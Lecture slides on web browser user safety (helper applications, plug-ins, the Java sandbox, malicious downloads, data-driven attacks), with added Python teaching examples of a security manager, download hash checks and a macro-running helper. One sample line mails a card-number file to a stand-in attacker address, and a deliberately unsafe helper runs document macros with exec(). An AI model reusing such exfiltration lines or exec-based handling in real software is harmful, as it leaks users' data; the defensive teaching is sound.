1
User Safety
  • CSCE 590 Farkas
  • November 20, 2000

2
Attackers
  • Want to run programs on other people's computers
    without their permission, in order to:
    • Find confidential information
    • Release information
    • Use it in future attacks
    • Compromise systems and data
    • Delete or modify stored information
    • Create new security holes
    • Mount denial-of-service attacks

3
Web Browsers and Security
  • Users access information on the Internet through
    web browsers
  • Web browsers are complex pieces of software
  • Sources of security problems:
    • Software bugs
    • New features
    • Helper applications
    • Programmability
    • Data-driven attacks
    • etc.

4
Software Bugs
  • The browser should protect the user from:
    • Eavesdropping
    • Hostile web pages
  • Browsers have bugs; attackers exploit these bugs
  • Most common attack: denial of service (the browser
    crashes)
  • Other attacks (cf. the Internet Worm)

5
Netscape Navigator
  • 1995-1996: security evaluations (UC Berkeley and
    Princeton University)
  • Problems found:
    • Random number generator
    • Java run-time environment
    • Applets running on computers behind the firewall
    • Applets executing arbitrary machine code
    • JavaScript: the user's information sent to other
      sites
    • Malicious web pages that send fake e-mails

6
Helper Applications
  • Web browsers understand only a small, predefined
    set of data types (e.g., ASCII text, HTML, GIF, JPEG)
  • Browser extension mechanism: helper applications
  • Helper applications: special programs that run
    automatically when data of a type other than the
    basic types is downloaded
  • E.g., Acrobat Reader
  • Problem: the helper application runs on the user's
    own computer but takes its input from the web server

7
Helper Applications
  • A malicious helper application may compromise the
    user's computer
  • Downloading a helper application yields either
    • an authentic copy, or
    • a compromised version
  • Possible consequence: total compromise of the user's
    computer system

8
Helper Applications
  • The most powerful application programs are therefore
    the highest security threats:
    • Interpreters for general-purpose programming
      languages
    • Applications containing such languages
      • MS Word
      • MS Excel
      • MS Visual Basic
      • Perl
      • PostScript interpreter
      • etc.

9
Plug-Ins
  • Helper applications loaded directly into the web
    browser
  • No separate download step: the data is left in the
    browser's memory and processed directly by the
    plug-in
  • Run automatically
  • Not safe

10
Getting Plug-Ins
  • Downloaded manually and stored in Netscape's plug-in
    directory
  • The web browser scans this directory to find plug-ins
  • Problem: plug-ins are precompiled, without source
    code, and can:
    • Be malicious by design
    • Be modified to contain malicious code
    • Have bugs that can be exploited
    • Implement a general-purpose programming language
      that can be misused

11
Programmability
  • Need the flexibility to download and run programs on
    the user's machine
  • Languages: Java, JavaScript, Visual Basic Script,
    Macromedia's Shockwave, MS's ActiveX

12
Java
  • Java design, 1991: consumer electronics controlled
    remotely using a common language (Sun Microsystems)
  • Compact, portable and reliable language
  • Programs are compiled into an interpreted bytecode
    and run on a virtual machine
  • Java is widely used to write programs that are
    downloaded over the Internet and interpreted locally
  • Java virtual machine

13
Java Security
  • Java was designed for code downloaded from the
    manufacturer or an approved content provider
  • How is the user protected from malicious and poorly
    written programs?
  • Limit what downloaded programs can do -> sandbox
    (virtual space)
  • Security manager class: special classes that allow a
    Java program within the sandbox to communicate with
    the outside world
  • Class loader: examines the correctness of the
    run-time system
  • Bytecode verifier: checks that downloaded bytecode
    could have been generated from valid source code

14
Java Security Policy
  • Java is
    • a general-purpose language
    • used to download applications from the web
  • Original security approach, three options:
    • Do not run Java programs
    • Run Java programs with different privileges based
      on the source of the program
    • No restriction on Java programs
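
As an added example (not code from the lecture or from Sun's JDK), the following Python sketch of a "security manager" shows the second option above in practice: every sensitive operation a downloaded program requests is checked against a policy tier picked from the program's source, and anything not explicitly granted is refused. The tiers, the trusted vendor host `updates.example.com`, the permission kinds and the simulated requests are all assumptions made for the illustration. The default sandbox tier grants only a connection back to the host the program came from, which mirrors the classic applet rule.

```python
# Added example, not code from the lecture: a minimal "security manager" in
# the spirit of slides 13-14. Every sensitive operation a downloaded program
# asks for is checked against a policy tier chosen from where the program
# came from. The tiers, the trusted vendor host and the requested operations
# are constructed for illustration.
from dataclasses import dataclass
from typing import FrozenSet, List, Tuple
from urllib.parse import urlparse


class SecurityException(Exception):
    """Raised when the sandbox refuses an operation, or refuses to run at all."""


@dataclass(frozen=True)
class Permission:
    kind: str     # "file.read", "file.write" or "net.connect"
    target: str   # directory prefix for file.*, host name for net.connect


@dataclass(frozen=True)
class Policy:
    name: str
    run: bool = True              # False: "do not run Java programs"
    unrestricted: bool = False    # True: "no restriction on Java programs"
    grants: FrozenSet[Permission] = frozenset()


TRUSTED_VENDOR = "updates.example.com"   # assumed: an approved content provider


def policy_for(codebase: str) -> Policy:
    """Pick privileges from the program's source (slide 14, second option)."""
    origin = urlparse(codebase)
    if origin.scheme == "file":
        # Installed locally by the user: treated like any other local program.
        return Policy("local", unrestricted=True)
    if origin.hostname == TRUSTED_VENDOR:
        return Policy("trusted", grants=frozenset({
            Permission("file.read", "/tmp"),
            Permission("net.connect", TRUSTED_VENDOR),
        }))
    if origin.hostname:
        # Unknown origin: default sandbox. The only outside contact allowed
        # is a connection back to the host the program was loaded from.
        return Policy("sandbox", grants=frozenset({
            Permission("net.connect", origin.hostname),
        }))
    # No usable origin at all: first option on slide 14, refuse to run.
    return Policy("blocked", run=False)


class SecurityManager:
    def __init__(self, codebase: str):
        self.codebase = codebase
        self.policy = policy_for(codebase)
        if not self.policy.run:
            raise SecurityException(f"refusing to run code from {codebase!r}")

    def _granted(self, kind: str, target: str) -> bool:
        for p in self.policy.grants:
            if p.kind != kind:
                continue
            if kind.startswith("file."):
                prefix = p.target.rstrip("/") + "/"
                if target == p.target or target.startswith(prefix):
                    return True
            elif p.target == target:
                return True
        return False

    def check(self, kind: str, target: str) -> bool:
        """True if allowed; SecurityException otherwise (deny by default)."""
        if self.policy.unrestricted or self._granted(kind, target):
            return True
        raise SecurityException(f"{self.policy.name}: {kind} {target} denied")


def run_program(codebase: str,
                requests: List[Tuple[str, str]]) -> List[Tuple[str, str, bool]]:
    """Simulate a program issuing requests; record which ones were allowed."""
    sm = SecurityManager(codebase)
    outcome = []
    for kind, target in requests:
        try:
            allowed = sm.check(kind, target)
        except SecurityException:
            allowed = False
        outcome.append((kind, target, allowed))
    return outcome


if __name__ == "__main__":
    applet = "http://applets.example.net/game.jar"
    print(run_program(applet, [("net.connect", "applets.example.net"),
                               ("file.read", "/etc/passwd")]))
```

The point to take from it is the shape of the decision, not the particular grants: privilege is attached to the code's origin before the code runs, the check sits between the program and every sensitive resource, and the answer when nothing matches is "no".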

15
Downloading Machine Code
  • Highest security risk: download a program from the
    Internet and run it
  • Personal computer operating systems do not limit
    program execution
    • Software bugs
    • Malicious code
  • The program runs with the privileges of the user who
    invoked it

16
Downloaded Programs
  • Card Shark (1996, First Virtual Holdings)
    • Appeared to be a screensaver
    • Also: it was waiting for credit card numbers
    • Posted the credit card numbers on the Internet
  • Long-distance phone call scam

17
Malicious Programs
  • Spend your money
    • One of the first cases was a pornography viewer
      that placed international long-distance calls
    • Electronic funds transfer (Quicken, 1997)
  • Violate privacy
    • A downloaded program can scan the local computer
      for sensitive data, then send the data by
      • E-mail (plain or encrypted)
      • HTTP
      • Encoding it in public data posted on the Internet
      • etc.

18
Improved Security
  • Use trusted vendors:
    • Good reputation
    • High security requirements
    • Bug-free software
  • Ensure that downloaded software is original
  • Minimize the privileges of downloaded software
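
"Ensure that downloaded software is original" has a concrete form: compare a digest of what you received with the digest the vendor published. The block below is an added example, not code from the lecture; the vendor release, the trojaned mirror copy and the digest values are constructed stand-ins. It also shows the caveat that matters in practice: a digest fetched from the same place as the file proves nothing, because whoever replaced the file can replace the digest too. The published digest has to arrive by a channel the mirror does not control (the vendor's own site, a signed announcement).

```python
# Added example, not code from the lecture: checking that a downloaded
# program is the copy the vendor actually published (slide 18). The vendor
# publishes a SHA-256 digest through a channel separate from the download;
# the client hashes what it received and compares in constant time. The
# vendor release, the trojaned copy and the digests are constructed here.
import hashlib
import hmac
import io
from typing import BinaryIO


def digest_stream(stream: BinaryIO, chunk_size: int = 64 * 1024) -> str:
    """SHA-256 of a stream, read in chunks so large installers fit in memory."""
    h = hashlib.sha256()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def sha256_hex(data: bytes) -> str:
    """Convenience wrapper for in-memory data."""
    return digest_stream(io.BytesIO(data))


def verify_download(data: bytes, published_digest: str) -> bool:
    """True only if the bytes hash to the digest obtained from the vendor."""
    actual = sha256_hex(data)
    # compare_digest does not leak how many leading characters matched.
    return hmac.compare_digest(actual, published_digest.strip().lower())


def install_if_original(data: bytes, published_digest: str) -> str:
    """Gate installation on the check; never run what failed it."""
    if not verify_download(data, published_digest):
        return "rejected"
    return "installed"


# Constructed stand-ins for a vendor release and its out-of-band digest.
VENDOR_RELEASE = b"#!/bin/sh\necho 'screensaver 1.0'\n"
PUBLISHED_DIGEST = sha256_hex(VENDOR_RELEASE)   # obtained from the vendor, not the mirror

# A mirror's copy with a payload appended (the Card Shark pattern of slide 16).
TROJANED_COPY = VENDOR_RELEASE + b"cat ~/.cardnumbers | mail attacker@example.net\n"


if __name__ == "__main__":
    print(install_if_original(VENDOR_RELEASE, PUBLISHED_DIGEST))   # installed
    print(install_if_original(TROJANED_COPY, PUBLISHED_DIGEST))    # rejected
    # Digest taken from the same mirror as the file: the check is useless.
    print(install_if_original(TROJANED_COPY, sha256_hex(TROJANED_COPY)))  # installed
```

A digest only proves the bytes match what the vendor hashed; it does not say the vendor's build is trustworthy, which is what the "use trusted vendors" bullet is for.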

19
Data-Driven Attacks
  • The attacker gives malicious data to an application
    -> undesirable results
  • The type of attack is determined by the downloaded
    data
  • E.g., an unsafe application program plus malicious
    data:
    • Viruses
    • Deletion of files
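
The following added example (not code from the lecture) ties the data-driven attack above to the interpreter warning of slide 8. A toy document format carries "@macro" lines; one helper application hands each macro to the Python interpreter, so the document's author decides what runs on the user's machine, while a hardened helper accepts only names from a fixed list of operations. The "@macro" syntax, both helpers, the `channel` dictionary standing in for a network or mail path, and the sample documents are all constructed for the illustration.

```python
# Added example, not code from the lecture: a toy document format that
# carries macros, handled by a helper application. unsafe_helper() hands each
# macro to the Python interpreter, so whoever wrote the document decides what
# runs on the user's machine (slides 8 and 19). safe_helper() accepts only an
# allow-list of fixed operations. The "@macro" syntax, both helpers and the
# sample documents are constructed here.
import re
from typing import Dict, List, Tuple

MACRO_RE = re.compile(r"^\s*@macro\s+(.+)$")


def parse_document(text: str) -> Tuple[List[str], List[str]]:
    """Separate body lines from macro lines."""
    body: List[str] = []
    macros: List[str] = []
    for line in text.splitlines():
        m = MACRO_RE.match(line)
        if m:
            macros.append(m.group(1))
        else:
            body.append(line)
    return body, macros


def unsafe_helper(text: str, channel: Dict[str, str]) -> List[str]:
    """Deliberately unsafe: macros are Python statements run with exec().

    `channel` stands in for anything the helper can reach (a socket, a mail
    client); a macro that writes to it exfiltrates the document."""
    body, macros = parse_document(text)
    env = {"document": body, "channel": channel}
    for macro in macros:
        exec(macro, {"__builtins__": {}}, env)   # document author controls this
    return env["document"]


# The only operations the hardened helper will perform, looked up by name.
SAFE_MACROS = {
    "uppercase": lambda body: [line.upper() for line in body],
    "number": lambda body: [f"{i + 1}: {line}" for i, line in enumerate(body)],
}


def safe_helper(text: str, channel: Dict[str, str]) -> List[str]:
    """Hardened: a macro is a name looked up in SAFE_MACROS, never code."""
    body, macros = parse_document(text)
    for macro in macros:
        op = SAFE_MACROS.get(macro.strip())
        if op is None:
            raise ValueError(f"rejected macro: {macro!r}")
        body = op(body)
    return body


# Constructed sample documents.
BENIGN_DOC = "quarterly figures\n@macro uppercase\n"
# Looks like a report; its macro copies the document out through the channel.
MALICIOUS_DOC = ('Card on file: 4111 1111 1111 1111\n'
                 '@macro channel["exfil"] = "\\n".join(document)\n')


def open_with(helper, doc: str) -> Tuple[List[str], Dict[str, str]]:
    """Run a helper on a document; return what it showed and what it leaked."""
    channel: Dict[str, str] = {}
    try:
        shown = helper(doc, channel)
    except ValueError as e:
        shown = [f"[helper refused: {e}]"]
    return shown, channel


if __name__ == "__main__":
    print(open_with(unsafe_helper, MALICIOUS_DOC))  # leaks the card number
    print(open_with(safe_helper, MALICIOUS_DOC))    # refuses the macro
    print(open_with(safe_helper, BENIGN_DOC))       # ['QUARTERLY FIGURES']
```

The difference between the two helpers is not the parser, which is shared, but what a macro is allowed to mean: in the unsafe one it is a program, so the "type of attack is determined by the downloaded data" exactly as the slide says; in the safe one it is a key into a table the helper's author wrote.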

20
Data-Driven Attacks
  • Social engineering
    • Ask the user for sensitive information
  • Usually users
    • Trust computer systems
    • Follow instructions